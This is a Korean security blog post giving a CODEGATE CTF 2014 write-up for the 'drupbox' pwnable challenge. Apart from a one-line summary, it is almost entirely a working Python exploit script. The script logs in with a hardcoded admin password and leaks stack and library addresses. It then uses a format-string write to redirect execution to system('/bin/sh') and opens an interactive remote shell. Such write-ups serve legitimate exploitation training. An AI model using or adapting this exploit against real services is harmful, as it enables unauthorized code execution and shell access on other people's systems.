CODEGATE CTF 2014 - drupbox

2014. 4. 20. 15:20·CTF/2014

Overview

Category : Pwnables

File :

drupbox

Summary : make failure chdir(), get admin password, 13byte fsb

Exploit

#!/usr/bin/python

from socket import *
from struct import pack,unpack

p = lambda x:pack("<L",x)

s = socket(AF_INET,SOCK_STREAM)
s.connect(("localhost",8887))

raw_input()

print s.recv(1024)
s.send("1\n")
print s.recv(1024)
s.send("admin\n")
print s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
print s.recv(1024)
s.send("2\n")

print s.recv(1024)
s.send("XXXX\n")

print s.recv(1024)
d = s.recv(1024)

stack = unpack("<L",d[4:8])[0]+0xa4
lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000
code = unpack("<L",d[32:36])[0] - 0x1197

print hex(code)

system_addr = lib+0x41260
system_arg = stack - 0x38e
read_plt = code + 0xbd0
pppr = code + 0xf47

print hex(stack)
print hex(lib)
raw_input(">value")

num =  ((stack&0x0000ffff) - 4)-926

payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)

s.send("4\n")
s.recv(1024)

s.send("1\n")

s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n")

s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")

s.recv(1024)
s.send("5\n")

s.recv(1024)
s.send("%"+str(num)+"c%12$hn")

raw_input(">")
s.recv(1024)

while 1:
    comm = raw_input("$")

    if comm == "exit":
        break

    s.send(comm+"\n")
    print s.recv(1024)
저작자표시 (새창열림)

'CTF > 2014' 카테고리의 다른 글

CODEGATE CTF 2014 QUAL - weird_snus  (0) 2014.04.20
CODEGATE CTF 2014 QUAL - 4stone  (0) 2014.04.20
'CTF/2014' 카테고리의 다른 글
  • CODEGATE CTF 2014 QUAL - weird_snus
  • CODEGATE CTF 2014 QUAL - 4stone
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    gnuboard
    정보보호올림피아드
    csaw ctf
    vuln
    power of community
    csaw
    web
    HUST2011
    POC
    pwnables
    HUST
    후기
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
CODEGATE CTF 2014 - drupbox
상단으로

티스토리툴바